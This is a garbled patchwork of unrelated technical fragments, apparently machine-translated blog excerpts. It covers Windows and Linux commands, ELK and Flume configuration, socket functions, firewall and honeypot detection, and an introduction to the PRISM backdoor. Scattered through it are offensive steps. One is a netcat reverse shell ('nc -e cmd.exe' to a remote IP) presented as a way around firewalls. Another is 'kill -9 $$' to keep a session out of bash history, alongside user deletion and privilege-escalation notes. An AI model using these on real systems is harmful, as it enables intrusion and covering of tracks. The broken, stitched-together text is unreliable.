you, and delete the user name to make him beautiful: net user username /delete. Haha, he is no longer. Check whether he is an administrator. But let's check which users are in the Administrators group, so that users can be useful to us. net localgroup administrators lists the members of the Administrators group. Then, let's look at the administrator user, because it was created when the system was created, so let's see when the system was created: net user administrator, and then check the time when
the /var/account/pacct file. You can use the options to specify both the command name and user name. This is a GNU statistical tool.
lastlog
Importance: Medium
Lists the last logon times of all users on the system. The data is stored in the /var/log/lastlog file.
lsof
Importance: High
List open files. This command will list all open files in a detailed table, including the file owner information, size, and information related to them.
strace
Importance: Medium
Diagnostic and debugging tools for tracking systems
: Find words that begin with a specific string
cut, paste and join: Data manipulation
fmt: Formatting text paragraphs
pr: Formatting text into a page/column form
fold: Wrapping lines of text
column: Formatting text into multiple columns or tables
expand and unexpand: Converting between tabs and spaces
nl: Add line numbers
seq: Printing numbers
bc: Calculator
factor: Factoring integers
gpg: Encrypt and sign files
toe: Terminfo Entries List
several times to copy the data in the receive buffer of s. The recv function only copies the data; it is the protocol that actually receives the data.) The recv function returns the actual number of bytes copied.
If an error occurs while recv is copying, SOCKET_ERROR is returned. If the recv function is interrupted while waiting for the protocol to receive data, 0 is returned.
5. close Function
Function prototype: int close (SOCKET s)
Parameter description
SOCKET s:
Check if the remote port is open for bash:
nc -nvv $IP $PORT
telnet $IP $PORT
Send the current task to the background and bring it back to the foreground:
Ctrl + Z
fg
Extract the first 5 characters of a variable:
${variable:0:5}
SSH debug mode:
ssh -vvv [email protected]_address
SSH with PEM key:
ssh [email protected]_address -i KEY.PEM
Monitoring log files:
tail -F $FILE_NAME
Script for monitoring multiple files, Multi_tail:
#!/bin/sh
functio
The day station is going to be a complete day. Often we can take the server Web services, but is updated than the Western reporters also faster than the administrator of the intranet infiltration of the seeds in the bud of the right to kill. Privilege escalation on a Linux system involves not only vulnerabilities but also many system configurations. Here are some of the privilege escalation methods I have summed up.
A few prerequisites
Already got a low-privilege shell.
The hacked machine has a very commo
Prevent the last session from being logged in bash history:
kill -9 $$
Scan the network for open ports:
nmap -p 8081 172.20.0.0/16
Set up git email:
git config --global user.email "me@111cn.net"
To sync with master if you have unpublished commits:
git pull --rebase origin master
Move all files whose names contain "txt" into the /home/user directory:
find -iname "*txt*" -exec mv -v {} /home/user \;
Display files side by side, line by line:
paste Test.txt Test1.txt
The progress bar in the shell:
pv
{
hosts => "elasticsearch:9200" # send the Logstash output to Elasticsearch; change this to your own host
}
}
And then we need to start the Kibana.
Write a startup script that waits for Elasticsearch to come up and then starts Kibana:
#!/usr/bin/env bash
# Wait for the Elasticsearch container to be ready before starting Kibana.
echo "Stalling for Elasticsearch"
while true; do
    # nc exits successfully once port 9200 accepts a connection
    nc -q 1 elasticsearch 9200 2>/dev/null && break
done
echo "Starting Kibana"
exec kibana
can be separated by an intermediate gateway
-k computer-list: Route packets along the list of computers specified by computer-list. Consecutive computers cannot be separated by an intermediary gateway
-w timeout: Specifies the time-out interval in milliseconds
destination-list: Specifies the remote computers to ping
The target host's operating system type can be roughly determined from the TTL value:
Windows: TTL is generally between 100~130;
Unix/Linux: generally between 240~255 or 50~60.
Collect from different sources, aggregate logs, and transfer them to the storage system.
A source reads data, which can come from a variety of clients or from another agent, and deposits it into the channel for the sink to consume; the entire process is asynchronous.
The event is only deleted when it is successfully deposited into the channel of the next agent (multiple agents) or the final destination (a single agent), ensuring reliability.
There are two kinds of channel: file and memory.
Multiple instances to
factor, while operating systems and networks are also causes of outages. SANs and RAID storage systems are not backup solutions.
* When using the pipe command, the first advantage is that the output file is automatically compressed during execution and does not require any additional temporary disk space, which is helpful when disk space is limited. The disadvantage is that the command takes extra time to execute; used in combination with mysqldump, it locks all tables, affects applicati
command will scan a server to locate the open ports and the services associated with those ports. This is an important security tool to prevent the network from being hacked.
nc
Degree of importance: Medium
The nc (netcat) tool is a complete toolkit that you can use to connect to and listen on TCP and UDP ports. It can be used as a diagnostic and test tool, or as a component of a script-based HTTP client
determine the type of firewall.
• Banner grabbing against firewalls. Although this method is not necessarily effective, some older firewalls may actually add some version information to the banner.
Finally, there is a honeypot. These devices can be used to trap or "imprison" attackers, or perhaps to learn more about their activities. The honeypot is divided into two types: low interaction and high interaction. The honeypot can be detected by observing their function. A good low interac
The ping-based ICMP backdoor that was inadvertently seen while searching. So to the author's GitHub to see, incredibly is engraved, in order to level, can only endure to see, the student dog hurt. Fortunately it's easier to understand, as the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."
Project address: https://github.com/andreafabrizi/prism
PRISM has only two main files, simple configuration, can be run on Linux, Solaris, AIX, BSD/Mac, Android and man
HTTP Proxy
Configure the HTTP_PROXY environment variable directly
git config http.proxy
http.proxy
Override the HTTP proxy, normally configured using the http_proxy, https_proxy, and
all_proxy environment variables (see curl(1)). This can be overridden on a per-remote
basis; see remote.<name>.proxy.
To configure a separate HTTPS proxy for a fixed remote
remote.<name>.proxy
For remotes that require curl (http, https and ftp), the URL to the proxy to
use for that remote. Set to the empty string to disable proxying for that remote.
How to use:
gi
(the general firewall does not intercept SYN connection requests initiated locally)
Use the tool Netcat to puncture this firewall:
nc -e cmd.exe <remote IP> <remote listening port>
Subsequently, port multiplexing technology also appeared, reusing ports that the firewall leaves open, such as 80, 21, 445
Typical backdoors include hkdoor and ntrootkit (the author is yyt_hac, from China)
There is also the use of unwarranted port protocols for communica
output; if you want to use the tail command, the file must be large enough for the output to be visible
exec.conf
a1.sources = r1
a1.sinks = k1
a1.channels = c1
# Describe/configure the source
#a1.sources.r1.type = exec
#a1.sources.r1.channels = c1
#a1.sources.r1.command = tail -f /var/log/flume.log
a1.sources.r1.type = netcat
a1.sources.r1.bind = localhost
a1.sources.r1.port = 44444
# Describe the sink
a1.sinks.k1.type = logger
# Use a channel which buf